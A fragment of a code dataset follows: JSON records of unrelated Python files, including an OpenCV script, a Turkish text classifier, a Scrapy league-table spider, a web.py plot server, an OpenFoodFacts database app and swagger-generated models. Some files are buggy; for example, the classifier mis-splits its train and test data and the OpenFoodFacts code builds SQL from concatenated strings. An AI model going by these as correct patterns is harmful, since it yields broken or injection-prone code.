\r\n##for i in range(len(contours)):\r\n#color = (rng.randint(0,256), rng.randint(0,256), rng.randint(0,256))\r\n#cv2.drawContours(drawing, contours_poly, index, color)\r\n#cv2.rectangle(drawing, (int(boundRect[index][0]), int(boundRect[index][1])), (int(boundRect[index][0]+boundRect[index][2]), int(boundRect[index][1]+boundRect[index][3])), (0,255,0), 2)\r\n#rcx=int(boundRect[index][0]+boundRect[index][2]/2)\r\n#rcy=int(boundRect[index][1]+boundRect[index][3]/2)\r\n#cv2.circle(drawing, (rcx,rcy), 2, (0, 255, 0), -1)\r\n### \r\n#res = cv2.resize(drawing,None,fx=0.5, fy=0.5, interpolation = cv2.INTER_CUBIC)\r\n#cv2.imshow('Contours1', res)\r\n# print (\"Area: {}, Perimeter: {}\".format(area, perimeter))\r\n#res1 = cv2.resize(org,None,fx=0.5, fy=0.5, interpolation = cv2.INTER_CUBIC) \r\n#cv2.imshow(\"Original\",res1)\r\n#cv2.imshow(\"Erode\",erosion)\r\n#cv2.imshow(\"Opening\",opening)\r\n#cv2.imshow(\"Contours\", cons)\r\n#cv2.resize(erosion, None, fx=0.3, fy=0.3)\r\n#cv2.resize(opening, None, fx=0.3, fy=0.3)\r\n#cv2.resize(cons, None, fx=0.3, fy=0.3)\r\ncv2.waitKey(0)\r\ncv2.destroyAllWindows()","sub_path":"hough.py","file_name":"hough.py","file_ext":"py","file_size_in_byte":3516,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"168329034","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Sun Apr 26 23:37:09 2020\r\n\r\n@author: Bjorn Funk\r\n\"\"\"\r\nfrom PIL import Image, ImageDraw, ImageFont\r\nimport Fluids\r\nimport kinetics as tempf\r\nimport heattransfer1 as ht1\r\n\r\n#pressureF = Fluids.function(tempf.fun('T'),ht1.fun)[0]\r\npressureF = Fluids.function(500,450)[0]#DELETE and use ^\r\n#pressureC = Fluids.function(ht1.fun,ht2.fun)[0]\r\npressureC = Fluids.coolant(500,450)[0] #DELETE and use ^\r\n\r\n\r\nlineWidth = 20\r\nwordLoc = 0\r\n\r\nimage = Image.open('FluidsModel.png')\r\ndraw = ImageDraw.Draw(image)\r\n\r\nfontA = ImageFont.truetype('arial.ttf',20)\r\ndraw.text(xy = (0,wordLoc),text = \"Fuel Loop(Pa)\",fill = (0,0,0),font = fontA)\r\n\r\nfor i in range(len(pressureF)):\r\n wordLoc += lineWidth\r\n pressureF[i] = round(pressureF[i])\r\n draw.text(xy = (0,wordLoc),text = \"Pressure F\" +str(i)+\": \"+str(pressureF[i]),fill = (0,0,0),font = fontA)\r\n\r\nwordLoc += 2*lineWidth\r\n\r\ndraw.text(xy = (0,wordLoc),text = \"Coolant Loop(Pa)\",fill = (0,0,0),font = fontA)\r\nfor i in range(len(pressureC)):\r\n wordLoc += lineWidth\r\n pressureC[i] = round(pressureC[i])\r\n draw.text(xy = (0,wordLoc),text = \"Pressure C\" +str(i)+\": \"+str(pressureC[i]),fill = (0,0,0),font = fontA)\r\n \r\nimage.save('FluidsModelNew.png')\r\n","sub_path":"Test Run Mar 29/FluidsGUI.py","file_name":"FluidsGUI.py","file_ext":"py","file_size_in_byte":1237,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"471367431","text":"import jpype\nimport pandas as pd\nimport numpy as np\nimport nltk\nimport re\nimport nltk as nlp\nfrom sklearn.feature_extraction.text import CountVectorizer\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.naive_bayes import GaussianNB\nfrom nltk.corpus import stopwords\n\nnltk.download('punkt')\n\njpype.startJVM(jpype.getDefaultJVMPath(),\"-Djava.class.path=/home/x/Desktop/zemberek-tum-2.0.jar\",\"-ea\")\nTr = jpype.JClass(\"net.zemberek.tr.yapi.TurkiyeTurkcesi\")\ntr = Tr()\n\nZemberek = jpype.JClass(\"net.zemberek.erisim.Zemberek\")\nzemberek = Zemberek(tr)\n\ndata = pd.read_csv(r\"dataset.csv\", encoding=\"UTF-8\")\n\ndata.Kategori = [1 if each == \"Spor\" else 2 if each == \"Teknoloji\" else 3 if each == \"Ekonomi\" else 0 for each in data.Kategori]\nKategori = data.Kategori\n\nİçerik = data.İçerik\ndata.İçerik = np.array(data.İçerik)\n\ndf_docs = pd.DataFrame({'Sinif': Kategori,'Dokuman': İçerik})\ndf_docs = df_docs[['Sinif', 'Dokuman']]\n\nnltk.download('stopwords')\nstopWords = set(stopwords.words('turkish'))\n\nWPT = nltk.WordPunctTokenizer()\n\nstop_word_list = nltk.corpus.stopwords.words('turkish')\nstop_word = ['abd', 'ancak', 'artık', 'ama', 'asla', 'aynı', 'b', 'bazı', 'bana', 'bazen', 'bazıları', 'bazısı', 'ben',\n 'beni', 'benim', 'beş', 'bile', 'bin', 'bir', 'birçoğu', 'birçok', 'birçokları', 'biri', 'birisi',\n 'birkaçı',\n 'birşey', 'birşeyi', 'biz', 'bize', 'bizi', 'bizim', 'böyle', 'böylece', 'bu', 'buna', 'bunda', 'bundan',\n 'bunu', 'bunun', 'burada', 'bütün', 'çoğu', 'çoğuna', 'çoğunu', 'd', 'değil', 'demek', 'diğer', 'diğeri',\n 'diğerleri', 'diye', 'dolayı', 'elbette', 'fakat', 'falan', 'felan', 'filan', 'gene', 'geri', 'göre',\n ' hangi', 'hangisi', 'hani', 'hatta', 'henüz', 'hepsine', 'hepsini', 'her biri', 'herkes', 'herkese',\n 'herkesi', 'hiç kimse', 'hiçbiri', 'hiçbirine', 'hiçbirini', 'i', 'ı', 'ilk', 'içinde', 'işte', 'iken',\n 'ila', 'ileri', 'iyi', 'kaç', 'kadar', 'kendi', 'kendine', 'kendini', 'kime', 'kimi', 'kimin', 'kimisi',\n 'ler', 'lar', 'madem', 'mi', 'ne kadar', 'ne zaman', 'nedir', 'nereden', 'nesi', 'neyse', 'ö', 'ona',\n 'ondan', 'onlar', 'onlara', 'onlardan', 'onların', 'onu', 'onun', 'orada', 'oysa', 'oysaki', 'öbürü',\n 'ön', 'önce', 'ötürü', 'öyle', 'peki', 'sana', 'sen', 'senden', 'seni', 'senin', 'sizden', 'size', 'sizi',\n 'sizin', 'son', 'sonra', 'şayet', 'şimdi', 'şöyle', 'şuna', 'şunda', 'şundan', 'şunlar', 'şunu', 'şunun',\n 'tabi', 'tamam', 'tümü', 'u', 'ü', 'üzere', 'var', 'vb', 'veyahut', 'ya da', 'yerine', 'yine', 'yoksa',\n 'zaten', 'zira']\n\nstop_word_list.extend(stop_word)\n\nDocument_list = pd.DataFrame(columns=['Kategori', 'İçerik'], index=range(20))\ni=0\nfor İçerik in data.İçerik:\n İçerik = re.sub(\"[^abcçdefgğhıiklmnoöprsştuüvyzABCÇDEFGĞHIİJKLMNOÖPRSŞTUÜVYZ]\", \" \", İçerik)\n \"\"\"İçerik = İçerik.lower()\"\"\"\n İçerik = nltk.word_tokenize(İçerik)\n İçerik = [kelime for kelime in İçerik if not kelime in set(stop_word_list)]\n lemma = nlp.WordNetLemmatizer()\n İçerik = [lemma.lemmatize(kelime) for kelime in İçerik]\n \n bos = []\n \n for kelime in İçerik:\n\n if kelime.strip() > '':\n yanit = zemberek.kelimeCozumle(kelime)\n \n if yanit:\n bos.append(zemberek.kelimeCozumle(kelime)[0].kok().icerik()) \n Document_list.Kategori[i] = data.Kategori[i]\n Document_list.İçerik[i] = bos\n \"\"\"Document_list.İçerik[i] = \" \".join(Document_list.İçerik[i])\"\"\"\n\njpype.shutdownJVM()\n\nmax_features = 1000\ncount_vectorizer = CountVectorizer(max_features)\nmatrix = count_vectorizer.fit_transform(Document_list.İçerik).toarray()\n\nx = matrix\ny = data.iloc[:, 0:1].values\n\nx_train, x_test = train_test_split(x, test_size=0.2)\ny_train, y_test = train_test_split(y, test_size=0.2)\n\nnb = GaussianNB()\n\n\nnb.fit(x_train, y_train)\n\nx_pred = nb.predict(y_test)\n\ndef tahminOutput(index): \n if index == 0:\n kategori = 'SPOR'\n elif index == 1:\n kategori = 'TEKNOLOJİ'\n elif index == 2:\n kategori = 'EKONOMİ'\n else:\n kategori = 'EĞİTİM'\n\n return kategori\n\n\n\ntahmin0 = tahminOutput(x_pred[0])\ntahmin1 = tahminOutput(x_pred[1])\ntahmin2 = tahminOutput(x_pred[2])\ntahmin3 = tahminOutput(x_pred[3])\n\n\nprint('\\n\\n\\n\\n*************************************')\nprint('*************************************')\n\n\nprint('1. YAZI TAHMİNİ : ', tahmin0)\nprint('--------------------------------------')\n\nprint('2. YAZI TAHMİNİ : ', tahmin1)\nprint('--------------------------------------')\n\nprint('3. YAZI TAHMİNİ : ', tahmin2)\nprint('--------------------------------------')\n\nprint('4. YAZI TAHMİNİ : ', tahmin3)\n\nprint('*************************************')\nprint('*************************************')\n\n","sub_path":"ml2.py","file_name":"ml2.py","file_ext":"py","file_size_in_byte":4966,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"229187628","text":"#!/usr/bin/env python\n'''\nioos_catalog/util.py\nA python module containing useful methods\n'''\n\nfrom urllib import urlencode\nfrom flask import request\nfrom math import ceil\n\ndef build_links(item_count, current_page, page_limit, query=None):\n '''\n Returns a list of RFC-5988 compliant links given the pagination information\n https://github.com/davidcelis/api-pagination\n http://tools.ietf.org/html/rfc5988\n\n :param int item_count: Total number of items or records\n :param int current_page: The current page number (starting with 0)\n :param int page_limit: Total number of pages\n :param dict query: The additional query parameters that should be used to construct the URL\n :return: list of RFC-5988 compliant links\n :rtype: list\n '''\n base_url = request.url.split('?')[0]\n query = query or {}\n links = []\n last_page_count = int(ceil(item_count * 1.0 / page_limit))\n if current_page < last_page_count:\n links.append(build_link(base_url, query, current_page+2, 'next'))\n links.append(build_link(base_url, query, 1, 'first'))\n if current_page > 0:\n links.append(build_link(base_url, query, current_page, 'prev'))\n links.append(build_link(base_url, query, last_page_count, 'last'))\n return links\n\ndef build_link(base_url, query, page, rel):\n '''\n Returns a RFC-5988 compliant link\n :param str base_url: Base URL\n :param dict query: The URL query parameters\n :param int page: The page number\n :param str rel: The rel text\n :return: RFC-5988 compliant link\n :rtype: str\n '''\n query['page'] = page\n return '<%s>; rel=\"%s\"' % (build_url(base_url, query), rel)\n\n\ndef build_url(url, query):\n '''\n If a query exists it concatenates the query string to the URL\n :param str url: URL\n :param dict query: URL Query parameters\n '''\n if query:\n url += '?' + urlencode(query)\n return url\n","sub_path":"ioos_catalog/util.py","file_name":"util.py","file_ext":"py","file_size_in_byte":1901,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"556404274","text":"import datetime\nfrom sqlalchemy import Column, String, Boolean, DateTime, Integer, Text\nimport base.common.orm\n\n\nclass MailQueue(base.common.orm.sql_base):\n\n __tablename__ = 'mail_queue'\n __table_args__ = {'sqlite_autoincrement': True}\n\n id = Column(Integer, primary_key=True, autoincrement=True)\n subject = Column(String(128), index=True, nullable=False)\n sender_name = Column(String(128), nullable=False)\n sender = Column(String(128), index=True, nullable=False)\n receiver_name = Column(String(128), nullable=False)\n receiver = Column(String(128), nullable=False)\n time_created = Column(DateTime, nullable=False, default=datetime.datetime.now())\n time_sent = Column(DateTime)\n sent = Column(Boolean, index=True, nullable=False, default=True)\n message = Column(Text, nullable=False)\n data = Column(Text)\n\n def __init__(self, sender, sender_name, receiver, receiver_name, subject, message, data=None):\n\n self.sender = sender\n self.sender_name = sender_name\n if not self.sender_name:\n self.sender_name = sender\n self.receiver = receiver\n self.receiver_name = receiver_name\n if not self.receiver_name:\n self.receiver_name = receiver\n self.subject = subject\n self.message = message\n self.data = data\n\n\ndef main():\n pass\n\nif __name__ == '__main__':\n\n main()\n","sub_path":"base2/bdays/src/models/mail.py","file_name":"mail.py","file_ext":"py","file_size_in_byte":1387,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"125764212","text":"from app.doc import parameter, JWT_ACCESS_TOKEN\n\nSIGNUP_POST = {\n 'tags': ['Account'],\n 'description': '회원가입',\n 'parameters': [\n parameter('name', '이름'),\n parameter('id', '사용자 아이디'),\n parameter('password', '사용자 비밀번호')\n ],\n 'responses': {\n '201': {\n 'description': '가입 완료'\n },\n '205': {\n 'description': '가입 불가능(중복된 ID)'\n }\n }\n}\n\nADDITIONAL_PATCH = {\n 'tags': ['Account'],\n 'description': '추가 세부 내용',\n 'parameters': [\n JWT_ACCESS_TOKEN,\n parameter('gender', '이름'),\n parameter('age', '나이'),\n parameter('address', '주소'),\n parameter('intro', '한 줄 소개'),\n ],\n 'responses': {\n '201': {\n 'description': '추가 완료'\n },\n '205': {\n 'description': '없는 ID'\n }\n }\n}","sub_path":"Server/app/doc/signup.py","file_name":"signup.py","file_ext":"py","file_size_in_byte":945,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"320287003","text":"from scrapy import Spider\nfrom EPL_table.items import EPLTableItem\nfrom scrapy import Request\nimport re\n\n\nclass EPLSpider(Spider):\n name = 'EPL_Table_spider'\n allowed_urls = ['https://www.transfermarkt.co.uk/']\n start_urls = ['https://www.transfermarkt.co.uk/']\n \n\n def parse(self, response):\n # List comprehension to generate all the urls for each page for the league season\n league_position_urls = ['https://www.transfermarkt.co.uk/premier-league/startseite/wettbewerb/GB1/plus/?saison_id={}'.format(x) for x in range(1997, 2019)] \n for url in league_position_urls:\n yield Request(url=url, callback=self.parse_league_table_page)\n\n def parse_league_table_page(self, response):\n #this function parses through the page to get information from the final league table for the season\n Season = response.xpath('//*[@id=\"wettbewerbsstartseite\"]/div[2]//div[@class=\"table-header\"]/text()').extract_first()\n\n Season = ''.join(re.findall('\\d+/\\d+', Season))\n # looping through each row of the table\n for i in range (1,21):\n #main xpath for each row\n row = response.xpath('//*[@id=\"wettbewerbsstartseite\"]/div[2]//tbody/tr[{}]'.format(i))\n #linked xpaths for each item to scrape\n Position =row.xpath('.//td[@class=\"rechts hauptlink nowrap\"]/text()').extract_first()\n \n Club = row.xpath('.//td[@class=\"no-border-links hauptlink\"]/a/text()').extract_first()\n \n if len(row.xpath('.//td[@class=\"zentriert\"]/text()').extract())> 3:\n Goal_Difference = row.xpath('.//td[@class=\"zentriert\"]/text()').extract()[2]\n Points = row.xpath('.//td[@class=\"zentriert\"]/text()').extract()[3]\n else:\n Goal_Difference = row.xpath('.//td[@class=\"zentriert\"]/text()').extract()[1]\n Points = row.xpath('.//td[@class=\"zentriert\"]/text()').extract()[2]\n\n Position = int(Position)\n Goal_Difference = int(Goal_Difference)\n Points = int(Points)\n \n # print(Season)\n # print(Club)\n # print(Position)\n # print(Goal_Difference)\n # print(Points)\n item = EPLTableItem()\n item['Season'] = Season \n item['Club'] = Club\n item['Position'] = Position\n item['Goal_Difference'] = Goal_Difference\n item['Points'] = Points\n yield item\n\n\n","sub_path":"Scrapping/Spiders/EPL_table/EPL_table/spiders/EPL_Table_spider.py","file_name":"EPL_Table_spider.py","file_ext":"py","file_size_in_byte":2504,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"519676742","text":"\"\"\" Defines the User repository \"\"\"\n\nfrom models import User, Email, PhoneNumber\n\n\nclass UserRepository:\n \"\"\" The repository for the user model \"\"\"\n\n @staticmethod\n def get(user_id):\n \"\"\" Query a user by user_id\"\"\"\n return User.query.filter_by(id=user_id).one()\n\n def update(self, user_id, last_name=None, first_name=None, emails=None, phone_numbers=None):\n \"\"\" Update a user's info \"\"\"\n user = self.get(user_id)\n if last_name:\n user.last_name = last_name\n if first_name:\n user.first_name = first_name\n\n if emails:\n old_emails = Email.query.filter_by(id=user_id).all()\n for old_email in old_emails:\n old_email.delete()\n self.add(user_id, emails=emails)\n\n if phone_numbers:\n old_numbers = PhoneNumber.query.filter_by(id=user_id).all()\n for old_number in old_numbers:\n old_number.delete()\n self.add(user_id, phone_numbers=phone_numbers)\n\n return user.save()\n\n def add(self, user_id, emails=None, phone_numbers=None):\n \"\"\" Add emails or phone numbers\"\"\"\n user = self.get(user_id)\n\n if emails:\n for mail in emails:\n email_obj = Email.query.filter_by(id=user_id).one()\n email_obj.mail = mail\n email_obj.save()\n if phone_numbers:\n for number in phone_numbers:\n number_obj = PhoneNumber.query.filter_by(id=user_id).one()\n number_obj.number = number\n number_obj.save()\n return user.save()\n\n @staticmethod\n def create(last_name, first_name, emails=None, phone_numbers=None):\n \"\"\" Create a new user \"\"\"\n user = User(last_name=last_name, first_name=first_name)\n if emails:\n for email in emails:\n Email(mail=email, user_id=user.id).save()\n if phone_numbers:\n for number in phone_numbers:\n PhoneNumber(number=number, user_id=user.id).save()\n return user.save()\n\n def delete(self, user_id):\n \"\"\" Delete a user \"\"\"\n user = self.get(user_id).delete()\n\n return user\n","sub_path":"src/repositories/user.py","file_name":"user.py","file_ext":"py","file_size_in_byte":2209,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"278560720","text":"#!/usr/bin/env python\nimport web\nimport plot_speedtest\n\nPLOT_NAME = '/tmp/speedtest_logs/bandwidth.png'\n\nurls = (\n'/bandwidth', 'showplot',\n)\n\nclass showplot:\n def GET(self):\n plot_speedtest.create_plot(PLOT_NAME)\n web.header(\"Content-Type\", 'image/png') # set HTTP header\n return open(PLOT_NAME,\"rb\").read() # open image for reading\n \n app = web.application(urls, globals())\n if __name__ == \"__main__\":\n app.run()","sub_path":"serve_to_web.py","file_name":"serve_to_web.py","file_ext":"py","file_size_in_byte":432,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"70154544","text":"#!/usr/bin/python3\n# coding: Utf-8\n\n\"\"\"\nApp : PyFood - OpenFoodFacts\nFile : api_openfoodfacts.py\nCreator : Grégory Le Terte\nInfo : Get list product OpenFoodFacts\n\"\"\"\nimport requests\nfrom constants import *\nfrom colorama import Fore\nfrom random import randint\n\n\nclass Api:\n def __init__(self, cursor):\n\n self.category = list()\n self.products = list()\n self.substitue = list()\n self.cleaned_products = list()\n\n self.url = OPENFOODFACTS_URL\n self.pages = OPENFOODFACTS_FIELDS\n self.mycursor = cursor\n\n self.categorie_name = \"\"\n self.categorie_id = \"\"\n\n def get_products(self):\n \"\"\"\n This method make a request via the API\n to get a list of products.\n \"\"\"\n\n nb_categorie = self.detailbase()\n\n if nb_categorie == 0:\n print(MENU_IMPORT)\n for page in range(1, 2):\n\n # page-by-page processing\n self.pages['page'] = page\n products_request = requests.get(self.url, self.pages)\n products = products_request.json()\n\n # Take only usefull informations\n for element in products['products']:\n for cat in CATEGORY_OK:\n catsplit = element[\"categories\"].split(\",\")\n for catoff in catsplit:\n if cat in catoff:\n if not all(tag in element for tag in (\n \"product_name\", \"brands\", \"nutrition_grade_fr\",\n \"url\",\n \"stores\", \"countries\", \"categories\")):\n continue\n elif element[\"categories\"][:3] == \"fr:\":\n continue\n\n self.cleaned_products.append(element)\n\n page += 1\n\n self.add_products()\n self.detailbase()\n\n def add_products(self):\n \"\"\"\n This method is a loop which products will be\n put into the database\n \"\"\"\n\n for element in self.cleaned_products:\n # character deletion \" ' \"\n\n element['product_name'] = cleaned_value(element['product_name'])\n element['brands'] = cleaned_value(element['brands'])\n element['stores'] = cleaned_value(element['stores'])\n element['countries'] = cleaned_value(element['countries'])\n element['product_name'] = element['product_name'].strip()\n\n sql_select = \"SELECT id FROM Products where name='\" + str(\n element['product_name']) + \"'\"\n\n # Execute Query.\n resultat, count = self.mycursor.select_request(sql_select)\n if count == 0:\n self.categorie_name = element['categories']\n id_categorie = self.add_categories()\n\n sql = \"INSERT INTO Products(name, id_category, brands,\" \\\n \" nutriscore,link, shop, country) VALUES('\" + \\\n str(element['product_name']) + \"',\" + \\\n str(id_categorie) + \",'\" + \\\n str(element['brands']) + \"','\" + \\\n str(element['nutrition_grade_fr']) + \"','\" + \\\n str(element['url']) + \"','\" + \\\n str(element['stores']) + \"','\" + \\\n str(element['countries']) + \"')\"\n self.mycursor.execute_request(sql)\n\n def add_categories(self):\n\n # SQL\n slist_categorie = self.categorie_name.split(',')\n element = slist_categorie[0].replace(\"'\", \" \")\n\n sql_select = \"SELECT id FROM Category where name='\" + element + \"'\"\n resultat, count = self.mycursor.select_request(sql_select)\n\n if count == 0:\n # Execute Query Insert Category\n sql_insert = \"INSERT INTO Category (name) VALUES \" \\\n \"('\" + element+ \"')\"\n self.mycursor.execute_request(sql_insert)\n\n # Execute Query for keep Id Category\n resultat, count = self.mycursor.select_request(sql_select)\n\n for resul in resultat:\n return resul[0]\n\n def detailbase(self):\n\n scategories = \"\"\n sproducts = \"\"\n sprodsub = \"\"\n ncat = 0\n resultat, count = self.mycursor.select_request(BDD_COUNT_CAT)\n for res in resultat:\n ncat = res[0]\n scategories = str(res[0]) + \" Catégories\"\n\n resultat, count = self.mycursor.select_request(BDD_COUNT_PRODUCTS)\n for res in resultat:\n sproducts = str(res[0]) + \" Produits\"\n\n resultat, count = self.mycursor.select_request(BDD_COUNT_SAVED)\n for res in resultat:\n sprodsub = str(res[0]) + \" Produits substitués \"\n\n print(MENU_BLANC)\n print(\n Fore.WHITE + MENU_ENTETE1.format(scategories, sproducts, sprodsub))\n print(MENU_BLANC)\n\n return ncat\n\n def del_table(self):\n\n self.mycursor.execute_request(BDD_DELETE_SAVED)\n self.mycursor.execute_request(BDD_DELETE_PRODUCTS)\n self.mycursor.execute_request(BDD_DELETE_CAT)\n self.mycursor.close_database()\n\n def show_categories(self):\n \"\"\" This method shows all the category.\"\"\"\n\n self.category = []\n sql_select = \"SELECT * FROM Category\"\n resultat, count = self.mycursor.select_request(sql_select)\n nbcat = 0\n nb_prod = 0\n if count > 0:\n for result in resultat:\n # on compte le nombre de produits par categorie\n\n sql_select = RQ_SHOW4.format(result[0])\n resultat, count = self.mycursor.select_request(sql_select)\n\n for resul1 in resultat:\n nb_prod = resul1[0]\n\n if nb_prod > 1:\n nb_prod = \"(\" + str(nb_prod) + \") Produits\"\n nbcat += 1\n print(Fore.WHITE + '\\t ' + str(nbcat) + \" -\" + str(\n result[1]) + nb_prod)\n self.category.append(result[0])\n\n return nbcat\n\n def show_products(self, id_cat):\n \"\"\" This method shows all the category.\"\"\"\n\n nbproduct = 0\n\n sql_select = \"SELECT Id,name,nutriscore FROM Products where id_\" \\\n \"category='\" + str(self.category[id_cat]) + \\\n \"' ORDER BY nutriscore\"\n resultat, count = self.mycursor.select_request(sql_select)\n\n for result in resultat:\n nbproduct += 1\n slibref = result[1]\n slibref = repr(slibref.replace('\\n', ''))\n slibref = slibref.replace(\"'\", \"\")\n if len(slibref) > 79: # limit 80 caract\n slibref = slibref[0:78] + \".\"\n\n print(Fore.WHITE + MENU1_TEXT2.format(str(nbproduct), str(slibref),\n color_nutriscore(result[2])))\n self.products.append(result[0])\n\n return nbproduct\n\n def show_products_substitue(self, id_cat, id_product):\n \"\"\" This method shows all the category.\"\"\"\n letter_base = 0\n sql_select = RQ_SHOW1.format(self.category[id_cat],\n self.products[id_product])\n resultat, count = self.mycursor.select_request(sql_select)\n for result in resultat:\n letter_base = result[0]\n\n sql_select = RQ_SHOW2.format(self.category[id_cat],\n self.products[id_product])\n resultat, count = self.mycursor.select_request(sql_select)\n\n pos_nutri_base = int(1 + NUSTRICORE.index(letter_base))\n nbsubtitue = 0\n\n # number of articles with superior quality\n nbsubtituetotal=0\n for result in resultat:\n pos_nutri = int(1 + NUSTRICORE.index(result[2]))\n if pos_nutri < pos_nutri_base:\n nbsubtituetotal += 1\n\n # we select an item at random\n article_found = 0\n if nbsubtituetotal>0:\n chiffre_hasard = randint(1, nbsubtituetotal)\n nbsubtitue=0\n\n\n for result in resultat:\n pos_nutri = int(1 + NUSTRICORE.index(result[2]))\n if pos_nutri < pos_nutri_base:\n nbsubtitue += 1\n\n if int(chiffre_hasard)==int(nbsubtitue):\n article_found = 1\n slibref = str(result[1])\n slibref = repr(slibref.replace('\\n', ''))\n slibref = slibref.replace(\"'\", \"\")\n\n lien_int = str(result[3])\n\n if len(slibref) > 79: # limit 80 caract\n slibref = slibref[0:79] + \".\"\n\n if len(lien_int) > 79: # limit 80 caract\n lien_int = lien_int[0:80]\n\n # Display random nutriscore\n print(MENU_BLANC)\n print(Fore.YELLOW + MENU1_TEXT4.format(nbsubtituetotal,\n letter_base.upper()))\n print(Fore.WHITE + MENU1_TEXT3.format(str(nbsubtitue),\n slibref,\n color_nutriscore(\n result[2]),\n lien_int,\n Fore.WHITE + str(\n result[4])))\n\n self.substitue.append(result[0])\n\n return article_found\n\n def save_article(self, id_prod_origin, id_prod_category):\n\n sql = \"INSERT INTO Saved(id_product_origin, id_product_substitue) \" \\\n \"VALUES(\" + str(self.products[id_prod_origin]) + \\\n \",\" + str(self.substitue[id_prod_category]) + \")\"\n self.mycursor.execute_request(sql)\n print(Fore.YELLOW + '\\t ' + \"Enregistrement effectué\")\n\n def list_articles_substitues(self):\n sql_select = \"SELECT * FROM Saved\"\n resultat, count = self.mycursor.select_request(sql_select)\n for result in resultat:\n sref_origin = result[1]\n sref_substitue = result[2]\n\n sql_select = RQ_SHOW3.format(str(sref_origin))\n resultat, count = self.mycursor.select_request(sql_select)\n for result0 in resultat:\n sref_origin = Fore.WHITE+\"Article d'origine : \" + \\\n str(result0[0])+\" (\"+\\\n color_nutriscore(result0[1])+Fore.WHITE+\")\"\n\n sql_select = RQ_SHOW3.format(str(sref_substitue))\n resultat, count = self.mycursor.select_request(sql_select)\n for result1 in resultat:\n sref_substitue = Fore.WHITE+\"Article Substitué : \" +\\\n str(result1[0])+\" (\"+\\\n color_nutriscore(result1[1])+Fore.WHITE+\")\"\n\n\n print(MENU_BLANC)\n print(Fore.WHITE + \"\\t \" + sref_origin + \" | \" + sref_substitue)\n\n\ndef color_nutriscore(nutriscore_value):\n nutriscore_value = str(nutriscore_value.upper())\n\n if nutriscore_value == \"A\":\n nutriscore_value = Fore.GREEN + nutriscore_value\n else:\n if nutriscore_value == \"B\":\n nutriscore_value = Fore.WHITE + nutriscore_value\n else:\n if nutriscore_value == \"C\":\n nutriscore_value = Fore.YELLOW + nutriscore_value\n else:\n nutriscore_value = Fore.RED + nutriscore_value\n\n return nutriscore_value\n\n\ndef cleaned_value(clean_value):\n return clean_value.replace(\"'\", \" \")\n","sub_path":"src/api_openfoodfacts.py","file_name":"api_openfoodfacts.py","file_ext":"py","file_size_in_byte":11926,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"400116286","text":"# coding: utf-8\n\n\"\"\"\n Pure Storage FlashBlade REST 1.11 Python SDK\n\n Pure Storage FlashBlade REST 1.11 Python SDK, developed by [Pure Storage, Inc](http://www.purestorage.com/). Documentations can be found at [purity-fb.readthedocs.io](http://purity-fb.readthedocs.io/).\n\n OpenAPI spec version: 1.11\n Contact: info@purestorage.com\n Generated by: https://github.com/swagger-api/swagger-codegen.git\n\"\"\"\n\n\nfrom pprint import pformat\nfrom six import iteritems\nimport re\n\n\nclass Keytab(object):\n \"\"\"\n NOTE: This class is auto generated by the swagger code generator program.\n Do not edit the class manually.\n \"\"\"\n\n\n \"\"\"\n Attributes:\n swagger_types (dict): The key is attribute name\n and the value is attribute type.\n attribute_map (dict): The key is attribute name\n and the value is json key in definition.\n \"\"\"\n swagger_types = {\n 'id': 'str',\n 'name': 'str',\n 'encryption_type': 'str',\n 'fqdn': 'str',\n 'kvno': 'int',\n 'prefix': 'str',\n 'principal': 'str',\n 'realm': 'str',\n 'suffix': 'int'\n }\n\n attribute_map = {\n 'id': 'id',\n 'name': 'name',\n 'encryption_type': 'encryption_type',\n 'fqdn': 'fqdn',\n 'kvno': 'kvno',\n 'prefix': 'prefix',\n 'principal': 'principal',\n 'realm': 'realm',\n 'suffix': 'suffix'\n }\n\n def __init__(self, id=None, name=None, encryption_type=None, fqdn=None, kvno=None, prefix=None, principal=None, realm=None, suffix=None):\n \"\"\"\n Keytab - a model defined in Swagger\n \"\"\"\n\n self._id = None\n self._name = None\n self._encryption_type = None\n self._fqdn = None\n self._kvno = None\n self._prefix = None\n self._principal = None\n self._realm = None\n self._suffix = None\n\n if id is not None:\n self.id = id\n if name is not None:\n self.name = name\n if encryption_type is not None:\n self.encryption_type = encryption_type\n if fqdn is not None:\n self.fqdn = fqdn\n if kvno is not None:\n self.kvno = kvno\n if prefix is not None:\n self.prefix = prefix\n if principal is not None:\n self.principal = principal\n if realm is not None:\n self.realm = realm\n if suffix is not None:\n self.suffix = suffix\n\n @property\n def id(self):\n \"\"\"\n Gets the id of this Keytab.\n A non-modifiable, globally unique ID chosen by the system.\n\n :return: The id of this Keytab.\n :rtype: str\n \"\"\"\n return self._id\n\n @id.setter\n def id(self, id):\n \"\"\"\n Sets the id of this Keytab.\n A non-modifiable, globally unique ID chosen by the system.\n\n :param id: The id of this Keytab.\n :type: str\n \"\"\"\n\n self._id = id\n\n @property\n def name(self):\n \"\"\"\n Gets the name of this Keytab.\n The name of the object (e.g., a file system or snapshot).\n\n :return: The name of this Keytab.\n :rtype: str\n \"\"\"\n return self._name\n\n @name.setter\n def name(self, name):\n \"\"\"\n Sets the name of this Keytab.\n The name of the object (e.g., a file system or snapshot).\n\n :param name: The name of this Keytab.\n :type: str\n \"\"\"\n\n self._name = name\n\n @property\n def encryption_type(self):\n \"\"\"\n Gets the encryption_type of this Keytab.\n The encryption type used by the kerberos domain controller to generate the keytab.\n\n :return: The encryption_type of this Keytab.\n :rtype: str\n \"\"\"\n return self._encryption_type\n\n @encryption_type.setter\n def encryption_type(self, encryption_type):\n \"\"\"\n Sets the encryption_type of this Keytab.\n The encryption type used by the 